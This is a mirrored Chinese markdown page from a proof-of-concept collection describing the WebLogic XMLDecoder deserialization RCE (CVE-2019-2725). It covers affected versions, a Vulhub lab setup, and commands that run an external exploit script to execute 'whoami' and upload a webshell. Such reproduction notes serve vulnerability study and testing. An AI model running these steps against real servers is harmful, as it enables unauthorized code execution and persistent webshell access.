mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-07 11:58:05 +00:00
62 lines
1.4 KiB
Markdown
62 lines
1.4 KiB
Markdown
|
|
# Weblogic XMLDecoder 反序列化远程代码执行漏洞 CVE-2019-2725
|
|||
|
|
|
|||
|
|
## 漏洞描述
|
|||
|
|
|
|||
|
|
由于在反序列化处理输入信息的过程中存在缺陷,未经授权的攻击者可以发送精心构造的恶意 HTTP 请求,利用该漏洞获取服务器权限,实现远程代码执行。
|
|||
|
|
|
|||
|
|
参考链接:
|
|||
|
|
|
|||
|
|
- https://github.com/TopScrew/CVE-2019-2725
|
|||
|
|
|
|||
|
|
## 漏洞影响
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
Weblogic 10.3.6
|
|||
|
|
Weblogic 12.1.3
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
影响组件:
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
bea_wls9_async_response.war
|
|||
|
|
wsat.war
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
## 环境搭建
|
|||
|
|
|
|||
|
|
Vulhub 搭建 weblogic 10.3.6.0 环境:
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
git clone https://github.com/vulhub/vulhub.git
|
|||
|
|
cd vulhub/weblogic/CVE-2017-10271
|
|||
|
|
docker-compose up -d
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
启动完成后访问`http://your-vps-ip:7001/console`可以看到管理界面。
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
## 漏洞复现
|
|||
|
|
|
|||
|
|
命令执行:
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
python weblogic-2019-2725.py 10.3.6 http://your-ip:7001/ whoami
|
|||
|
|
```
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
上传 webshell:
|
|||
|
|
|
|||
|
|
```
|
|||
|
|
python weblogic-2019-2725.py 10.3.6 http://your-ip:7001/
|
|||
|
|
```
|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|

|
|||
|
|
|
|||
|
|
## 漏洞POC
|
|||
|
|
|
|||
|
|
- https://github.com/TopScrew/CVE-2019-2725
|